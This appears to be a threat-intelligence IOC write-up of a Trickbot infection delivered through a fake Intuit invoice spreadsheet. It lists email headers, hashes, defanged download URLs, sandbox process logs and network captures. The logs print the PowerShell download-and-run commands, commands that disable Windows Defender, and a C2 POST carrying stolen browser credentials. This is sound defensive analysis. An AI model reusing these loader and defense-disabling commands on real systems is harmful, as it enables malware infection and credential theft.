#trickbot_240918

1. #IOC #OptiData #VR #Trickbot #X97M #macro
2.  
3. https://myonlinesecurity.co.uk/trickbot-delivered-via-fake-intuit-fw-invoice-3989021-email/
4.  
5. email_headers
6. --------------
7. Received: from intuit-invoice.co.uk (hosted-by.leaseweb.com [5.79.78.24] (may be forged))
8. by mailsrv1.victim.com (8.15.2/8.15.2) with ESMTP id w8OBMBKB095862
9. for <user1@mev.victim.com>; Mon, 24 Sep 2018 14:22:11 +0300 (EEST)
10. (envelope-from J.Monta-user1=mev.victim.com@intuit-invoice.co.uk)
11. Received: by intuit-invoice.co.uk id hl34cda5qi05 for <user1@mev.victim.com>;
12. Mon, 24 Sep 2018 07:07:32 -0400 (envelope-from <J.Monta-user1=mev.victim.com@intuit-invoice.co.uk>)
13. Subject: FW: Invoice #3989021
14. From: "Intuit Invoice" <J.Monta@intuit-invoice.co.uk>
15.  
16. files
17. --------------
18.  
19. SHA-256 b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233
20. File name Invoice3989021.xls
21. File size 56.5 KB
22.  
23. SHA-256 f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107
24. File name Client dll for Pim Index Maintenance
25. File size 361 KB
26.  
27. h11p: \eaucardinal{.} com/perfo.rmance
28. h11p: \abogadodetexas{.} com/perfo.rmance
29.  
30. activity
31. -------------
32.  
33. proc
34. --------------
35. "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
36. cmd /c powershell "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''%tmp%\very.exe'');start-process ''%tmp%\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath %tmp%\parser.bat; start-process '%tmp%\parser.bat' -windowstyle hidden"
37. powershell "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''C:\tmp\very.exe'');start-process ''C:\tmp\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath C:\tmp\parser.bat; start-process 'C:\tmp\parser.bat' -windowstyle hidden"
38. cmd /c ""C:\tmp\parser.bat" "
39. powershell "function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,'C:\tmp\very.exe');start-process 'C:\tmp\very.exe';}try{iter('http://eaucardinal{.} com/perfo.rmance')}catch{iter('http://abogadodetexas{.} com/perfo.rmance')}
40. "C:\tmp\very.exe"
41. C:\Windows\SysWOW64\cmd.exe
42. sc stop WinDefend
43. sc delete WinDefend
44. /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
45. powershell Set-MpPreference -DisableRealtimeMonitoring $true
46. C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
47. C:\Windows\SysWOW64\cmd.exe
48. sc stop WinDefend
49. sc delete WinDefend
50. /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
51. C:\Windows\system32\svchost.exe
52. svchost.exe
53. svchost.exe
54. :\Windows\system32\svchost.exe -k netsvcs
55. C:\Windows\system32\taskeng.exe {6A47CA07-7739-4626-8919-0200D91B9F0B} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
56. C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
57. C:\Windows\SysWOW64\cmd.exe
58. /c sc stop WinDefend
59. sc delete WinDefend
60. C:\Windows\SysWOW64\cmd.exe
61. /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
62. C:\Windows\system32\svchost.exe
63.  
64. persist
65. --------------
66. \Msntcs Client dll for Pim Index Maintenance
67. Client dll for Pim Index Maintenance
68. c:\users\operator\appdata\roaming\aimt\vesy.exe 24.09.2018 11:16
69.  
70. netwrk
71. --------------
72. 198.50.100.170 eaucardinal{.} com GET /perfo.rmance HTTP/1.1 301
73. 198.50.100.170 www.eaucardinal{.} com GET /perfo.rmance HTTP/1.1 404
74. 23.229.233.135 abogadodetexas{.} com GET /perfo.rmance HTTP/1.1 200 !This program cannot be run in DOS mode.
75.  
76. 52.1.46.34 checkip.amazonaws.com GET / HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) 200 Public IP
77.  
78. 138.34.45.133 138.34.45.133 POST /ser0924/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
79. 138.34.45.133 138.34.45.133 POST /ser0924/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
80.  
81. POST /ser0924/APM11_W617601.id/81/ HTTP/1.1
82. Accept: */*
83. User-Agent: Mozilla/4.0
84. Host: 138.34.45.133
85.  
86. -----------NZYIBXEQQVBQBMZW
87. Content-Disposition: form-data; name="data"
88.  
89. http://www.i.ua|oper|********(saved passwd)
90. https://www.ukr.net|11oper|********(saved passwd)
91. https://accounts.google.com|oper11.wdma@gmail.com|********(saved passwd)
92. https://login.live.com|oper11.wdma@gmail.com|********(saved passwd)
93.  
94. -----------NZYIBXEQQVBQBMZW
95. Content-Disposition: form-data; name="source"
96.  
97. firefox passwords
98. -----------NZYIBXEQ
99.  
100. powershell.exe 2336 TCP 10.0.2.15 49693 198.50.100.170 80 ESTABLISHED
101. powershell.exe 2336 TCP 10.0.2.15 49694 198.50.100.170 80 ESTABLISHED
102. powershell.exe 2336 TCP 10.0.2.15 49695 23.229.233.135 80 ESTABLISHED
103.  
104.  
105. svchost.exe 2540 TCP 10.0.2.15 49696 216.239.32.21 80 ESTABLISHED
106. svchost.exe 2540 TCP 10.0.2.15 49697 216.239.32.21 443 ESTABLISHED
107. svchost.exe 2540 TCP 10.0.2.15 49698 107.181.174.176 443 SYN_SENT
108.  
109.  
110. svchost.exe 2540 TCP apm11 49696 any-in-2015.1e100.net http ESTABLISHED
111. svchost.exe 2540 TCP apm11 49697 any-in-2015.1e100.net https ESTABLISHED
112. svchost.exe 2540 TCP apm11 49699 vds5605.example.com https SYN_SENT
113.  
114. # # #
115. https://www.virustotal.com/#/file/b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233/community
116. https://www.virustotal.com/#/file/f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107/community
117. https://analyze.intezer.com/#/analyses/7b1c2c08-1538-4aa1-a0b4-c4a66c7dbcc9